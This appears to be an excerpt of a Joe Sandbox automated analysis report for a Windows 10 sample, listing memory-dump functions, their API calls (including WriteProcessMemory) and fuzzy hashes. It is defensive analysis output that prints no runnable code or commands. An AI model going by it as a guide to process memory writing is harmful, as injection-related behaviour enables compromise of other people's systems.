                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID: imm32.dll
                                                                        • API String ID: 2340568224-1815517138
                                                                        • Opcode ID: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                        • Instruction ID: 816a1f0bcc38b5fe124907dc713d354a62ea22c1b5ef718e55cc8bac2181f8fc
                                                                        • Opcode Fuzzy Hash: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                        • Instruction Fuzzy Hash: F3F0E271608744AFD711DB68AC36B65B7ECD348B10FD2C4E6F008D39E0EA759980CA20

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00BAE394 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: MAINICON
                                                                        • API String ID: 2457776203-2283262055
                                                                        • Opcode ID: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                        • Instruction ID: 2524b4a6ddd932bf2146fc068aed1bf61bda67de64a1989dbd01c35ad8abf018
                                                                        • Opcode Fuzzy Hash: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                        • Instruction Fuzzy Hash: E4612B70A042848FDB01EF38D885B957BE5AB15304F4884F9E808CF357DBB59948CB61

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x0091AF3C (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0091AF7E
                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0091AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.000000000090B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0090B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_90b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$Size
                                                                        • String ID:
                                                                        • API String ID: 2104008232-0
                                                                        • Opcode ID: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                        • Instruction ID: fb878bab0baaefd6573d80c1c4d3e864ee8750e931245e6ab9a4d02e05b557ce
                                                                        • Opcode Fuzzy Hash: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                        • Instruction Fuzzy Hash: 1D213DB1B0060DAFDB15DFB8CC829AEB7FCEB89310B514471B610E3691EB34DE419622

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00BA7B98 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00BA7DC8), ref: 00BA7D46
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                        • Instruction ID: c972dfceb7f9d5885886ac9c16fc0218747b7e7f8416ade7e42283158c5cdf4b
                                                                        • Opcode Fuzzy Hash: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                        • Instruction Fuzzy Hash: 49518C7064C2445BDB21AB38CC85BAA77D4EF46710F0845F9EC859B297DE74CC8987A0

                                                                        Control-flow Graph

                                                                        control_flow_graph: basic-block list for the function at 0x00BCA114 (serialized graph data with executed/not-executed colouring; rendered graph not reproduced)
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00BCA1AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000BCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BCA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bca000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                        • Instruction ID: 462f3ab7d48d92185eb81351417e236bbc40db4feb3c10684c611fe990435b9d
                                                                        • Opcode Fuzzy Hash: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                        • Instruction Fuzzy Hash: CC613D346092888BC714DB2CE961A6AB7F2FBC5308F24446FE145CB3A6FA759945CB07

                                                                        Control-flow Graph

                                                                        control_flow_graph 434 bad5d8-bad5f0 435 bad5f2-bad5fe 434->435 436 bad601-bad616 434->436 435->436 437 bad618-bad61f call bb0d6c 436->437 438 bad624-bad639 436->438 437->438 441 bad63b-bad651 call aeacf0 438->441 442 bad653-bad662 call aeacf0 438->442 448 bad667-bad688 SystemParametersInfoW 441->448 442->448 450 bad68a-bad6ee call aeacf0 * 4 448->450 451 bad6f0-bad737 call aeae28 call aeacf0 * 3 448->451 472 bad73c-bad780 call aeaa7c * 3 450->472 451->472 481 bad782-bad78b call bb0d6c 472->481 482 bad790 472->482 481->482
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00B9F730,?,00BACC47,00000000,00000000,00BA783C,6E6F4646,?,?,00000000), ref: 00BAD681
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem
                                                                        • String ID:
                                                                        • API String ID: 3098949447-0
                                                                        • Opcode ID: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
                                                                        • Instruction ID: 0fed921bd2ac38893e3fe96d867c73d3c62318e9c4a301da478f94341b3b3cb2
                                                                        • Opcode Fuzzy Hash: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
                                                                        • Instruction Fuzzy Hash: FD4178306042449FD750FBB8CD82B9A37E9AF85700F5480B1BD0CDB796EE31AD458B65

                                                                        Control-flow Graph

                                                                        control_flow_graph 484 beb7b0-beb7d9 485 beb7db 484->485 486 beb805-beb80b 484->486 487 beb7dd-beb7e0 485->487 488 beb7e2-beb804 WriteProcessMemory 485->488 487->486 487->488
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_beb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 458d5fa0715db57a05b05100e8dd3828df2f60ebeb32adf3667a545f5fda9bae
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 45F0247174024E26EF189CBD9C41FAEBBDACBC2630F1583AAB919C62D4EA7088044291

                                                                        Control-flow Graph

                                                                        control_flow_graph 489 bacffc-bad019 491 bad01e-bad021 489->491 492 bad023-bad026 491->492 493 bad030 491->493 492->493 494 bad028-bad02e 492->494 495 bad032-bad04d LoadCursorW call bad17c 493->495 494->495 495->491 498 bad04f-bad053 495->498
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00000000,?,?,?,00B9F730,00BACB5F,?,?,00000000,?,00B193F0), ref: 00BAD036
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                        • Instruction ID: ec0eb07764ccd192abd4c7c5fa3c8d6469be309d1ee0b73fd9376d68d7e958b7
                                                                        • Opcode Fuzzy Hash: ec80d4291437f1cdc313cca2f933061946e46ac6139ee6a1d4bb4feb06091a5f
                                                                        • Instruction Fuzzy Hash: 64F0A0226092002BE6305A3D4CE0F6AB2C8DBC7330F2003B6F93E976D1DA211C0616A0

                                                                        Control-flow Graph

                                                                        control_flow_graph 499 b094b0-b094f7 KiUserCallbackDispatcher
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B094EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                        • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4456603303.00000000010E2000.00000020.00000001.01000000.00000007.sdmp, Offset: 010E2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_10e2000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: ceb655d00bf0874a40dc8ef9e0a515f070c860bf3a730ae11ede1ea62069664f
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 19F05C2096C146EFC720CA3884C0B777BE1CF95310F2197ACB5DE8B641D2794C0AE600
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00BFF25A
                                                                        • _malloc.LIBCMT ref: 00BFF293
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2C6
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00BF9E02,?,?), ref: 00BFF2E2
                                                                        • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00BFF31C
                                                                        • _malloc.LIBCMT ref: 00BFF355
                                                                        • __freea.LIBCMT ref: 00BFF3AD
                                                                        • __freea.LIBCMT ref: 00BFF3B6
                                                                        • _malloc.LIBCMT ref: 00BFF46B
                                                                        • _memset.LIBCMT ref: 00BFF48D
                                                                        • __freea.LIBCMT ref: 00BFF4D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                        • String ID:
                                                                        • API String ID: 3920393152-0
                                                                        • Opcode ID: 91b3978627b20820c3e5adc3148b1e93734f17d59ee2eb7e4b7e5340f5688459
                                                                        • Instruction ID: ba48e122e899d6f583cff1a0fbd3a12f70555ff8eb59a30073821a8a9ab95adf
                                                                        • Opcode Fuzzy Hash: 91b3978627b20820c3e5adc3148b1e93734f17d59ee2eb7e4b7e5340f5688459
                                                                        • Instruction Fuzzy Hash: 17B16B7280011EAFCF219FA4CC818BE7BE5EF48354B1545B9FA05A7260D7318E99DB64
                                                                        APIs
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,?,00BFA861), ref: 00BFBA60
                                                                        • __init_pointers.LIBCMT ref: 00BFBA6A
                                                                        • __mtterm.LIBCMT ref: 00BFBB20
                                                                          • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__init_pointers__mtterm
                                                                        • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 3928193026-1030280904
                                                                        • Opcode ID: d230966ecdc2d47109a37de771c1bbb137af24c49b53880f4ad6d07d041e6927
                                                                        • Instruction ID: b5e24b7fe362b3f8965cf7ad2d1210c03277acf48629d45f25f6181abefaeeef
                                                                        • Opcode Fuzzy Hash: d230966ecdc2d47109a37de771c1bbb137af24c49b53880f4ad6d07d041e6927
                                                                        • Instruction Fuzzy Hash: 974180318003199AD721AFB5ED55F2F3BD4EB04320B1245BEEA14D39B2DB75848BCB60
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00C02355
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00BFF75E), ref: 00C02395
                                                                        • _malloc.LIBCMT ref: 00C023A5
                                                                        • _memset.LIBCMT ref: 00C023CD
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                        • __freea.LIBCMT ref: 00C0246C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                        • String ID:
                                                                        • API String ID: 3923921168-0
                                                                        • Opcode ID: b605a741fde1945a6e110d3932523fb5af8e3c8c14ee8ade3ed42b9107992a86
                                                                        • Instruction ID: 923228956e492c72773e8fb39158ee06d2ee09dd9c10099dbcccde06a69c0f3c
                                                                        • Opcode Fuzzy Hash: b605a741fde1945a6e110d3932523fb5af8e3c8c14ee8ade3ed42b9107992a86
                                                                        • Instruction Fuzzy Hash: 4E516D31900219EFCF219FA5DC48DEFBBB9EF89760F204129F524B61A0D7358A41DBA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: String___crt$Type_memset
                                                                        • String ID:
                                                                        • API String ID: 1957702402-3916222277
                                                                        • Opcode ID: fe33630ccf7c12356ace0ecb3f91cb4a4d1c103c1c1c903ba6be12a4a4041bd7
                                                                        • Instruction ID: 60a331ec22b517b6eaa795436eaaffaa973e651266812a27284c0f7e9f26153e
                                                                        • Opcode Fuzzy Hash: fe33630ccf7c12356ace0ecb3f91cb4a4d1c103c1c1c903ba6be12a4a4041bd7
                                                                        • Instruction Fuzzy Hash: 194113B510079C6FDB258B249C94FFBBBECEF05704F2444E8E68A87182D2719A499F61
                                                                        APIs
                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 00C04BC1
                                                                        • __FindPESection.LIBCMT ref: 00C04BDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                        • String ID:
                                                                        • API String ID: 876702719-0
                                                                        • Opcode ID: d0b45e20526ae4853de5b35b1765733cdf408476fd2bce95ca599e635fae6fdf
                                                                        • Instruction ID: 40cbd70fffaaacb92a047f8dec5cf9516b77c969e5c2e6b61980e2c7d12ff4ac
                                                                        • Opcode Fuzzy Hash: d0b45e20526ae4853de5b35b1765733cdf408476fd2bce95ca599e635fae6fdf
                                                                        • Instruction Fuzzy Hash: E091E5B2A006188BDB28CF59D88076FB7B5FB84351F16412CDA25977E1E731ED42CB90
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                        • _malloc.LIBCMT ref: 00BFF64F
                                                                          • Part of subcall function 00C022D3: _strlen.LIBCMT ref: 00C02355
                                                                          • Part of subcall function 00C022D3: _memset.LIBCMT ref: 00C023CD
                                                                          • Part of subcall function 00C022D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00BFF75E,?), ref: 00C023E4
                                                                        • _memset.LIBCMT ref: 00BFF66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                        • __freea.LIBCMT ref: 00BFF69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                        • String ID:
                                                                        • API String ID: 574822426-0
                                                                        • Opcode ID: e24f85320cfe0532b2630072a3f03b592c182d4e72254d9a1ae54922a3161ee5
                                                                        • Instruction ID: 389888b77e2e60ada80113e1f82c2895dbb49de9c9b4949c180208555d65117c
                                                                        • Opcode Fuzzy Hash: e24f85320cfe0532b2630072a3f03b592c182d4e72254d9a1ae54922a3161ee5
                                                                        • Instruction Fuzzy Hash: 6251687250010FBFCB20AFA49C819BE7BE9EF18354B1405BAFA14C7160DA31CD68DBA0
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00C04031
                                                                          • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0392F
                                                                          • Part of subcall function 00C03921: __getptd.LIBCMT ref: 00C0393D
                                                                        • __getptd.LIBCMT ref: 00C0403B
                                                                          • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                        • __getptd.LIBCMT ref: 00C04049
                                                                        • __getptd.LIBCMT ref: 00C04057
                                                                        • __getptd.LIBCMT ref: 00C04062
                                                                          • Part of subcall function 00C039C6: __CallSettingFrame@12.LIBCMT ref: 00C03A12
                                                                          • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0413E
                                                                          • Part of subcall function 00C0412F: __getptd.LIBCMT ref: 00C0414C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                        • String ID:
                                                                        • API String ID: 3174811152-0
                                                                        • Opcode ID: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                        • Instruction ID: c825005b41c106604121e7cee1b8e5517399703964e7ade00920bd4aa3271c68
                                                                        • Opcode Fuzzy Hash: 207eb629d19133c1b58a5250d1da6745d41d4e5ad16821eb7d210aa5e97d8cc6
                                                                        • Instruction Fuzzy Hash: 181107B5C04209DFDB00EFA4C985AAE7BF0FF04310F1080A9F914A7291DB789A55DF51
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        • Opcode ID: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                        • Instruction ID: facfc26de495bd95f743f6b9e6ff843d37e0a52cc7384122512081d852e66927
                                                                        • Opcode Fuzzy Hash: 50924ce77512a2b9dafe910b696f906bb0c761ed524ada5e9755cf228c8b0ce0
                                                                        • Instruction Fuzzy Hash: E011907190420CEFEB10EBB8DC52B7EB7E8FB48314F254066E714D6181EE359A948626
                                                                        APIs
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,008F8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 008F84F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor
                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1773637529-812649623
                                                                        APIs
                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 008FC871
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 008FC8CF
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 008FC92C
                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 008FC95F
                                                                          • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,008FC8DD), ref: 008FC833
                                                                          • Part of subcall function 008FC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,008FC8DD), ref: 008FC850
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_8f1000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                        • String ID:
                                                                        • API String ID: 2255706666-0
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00BFF75E,?,?,?), ref: 00BFF61A
                                                                        • _memset.LIBCMT ref: 00BFF66F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00BFF684
                                                                        • __freea.LIBCMT ref: 00BFF69C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_memset
                                                                        • String ID:
                                                                        • API String ID: 2568176243-0
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00BFB635), ref: 00BFB5AC
                                                                        • TlsGetValue.KERNEL32(00C0C658,?,00BFB635), ref: 00BFB5C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-629428536
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB531
                                                                        • TlsGetValue.KERNEL32(00C0C658,?,00BFB598,00000000,00C0273C,00C0F6D0,00000000,00000314,?,00C00261,00C0F6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00BFB548
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 3702945584-3682587211
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallFrame@12Setting__getptd
                                                                        • String ID: j
                                                                        • API String ID: 3454690891-2137352139
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 00C043C9
                                                                          • Part of subcall function 00C04324: ___BuildCatchObjectHelper.LIBCMT ref: 00C0435A
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C043E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                        • String ID: csm
                                                                        • API String ID: 3487967840-1018135373
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00C0413E
                                                                          • Part of subcall function 00BFB7E6: __amsg_exit.LIBCMT ref: 00BFB7F6
                                                                        • __getptd.LIBCMT ref: 00C0414C
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit
                                                                        • String ID: csm
                                                                        • API String ID: 1969926928-1018135373